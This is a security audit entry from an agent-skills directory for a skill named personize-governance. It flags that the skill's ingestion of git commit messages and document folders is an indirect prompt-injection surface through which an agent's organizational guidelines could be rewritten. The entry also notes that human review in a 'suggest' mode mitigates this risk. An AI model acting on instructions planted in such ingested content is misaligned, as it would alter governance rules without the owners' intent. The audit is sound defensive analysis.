The Agent Skills Directory

[INDIRECT_PROMPT_INJECTION]: The skill facilitates the ingestion of external data from sources like git commit messages and document folders to propose guideline updates, creating an attack surface for indirect prompt injection.
Ingestion points: Processes git commit logs in auto-learning-loop.ts and directory contents in document-ingestion.ts.
Boundary markers: Guidelines are structured using standard Markdown headers (#, ##) and specialized tags such as <HARD_CONSTRAINT> for rule classification.
Capability inventory: The agent can create, update, and manage organizational guidelines using SDK methods like client.guidelines.create and client.guidelines.update across multiple recipes.
Sanitization: The skill primarily relies on LLM-powered extraction followed by a mandatory "suggest" mode that requires human review before applying any changes to the governance base.
[COMMAND_EXECUTION]: The auto-learning-loop.ts script uses spawnSync to execute git log for commit analysis. The command is invoked with an arguments array, which effectively mitigates shell injection risks.
[DATA_EXPOSURE]: The skill handles sensitive organizational policies and requires a PERSONIZE_SECRET_KEY for API access. This is a legitimate functional requirement for the vendor's service and is managed via standard environment variables.
[SAFE]: The ide-governance-bridge.ts script includes explicit path validation logic in the generateClaudeMd function to prevent path traversal attacks, ensuring that generated files remain within the current working directory.
[SAFE]: All external resources, including the required SDK and API endpoints, originate from the official domain and repositories of the skill's author, personizeai.

personize-governance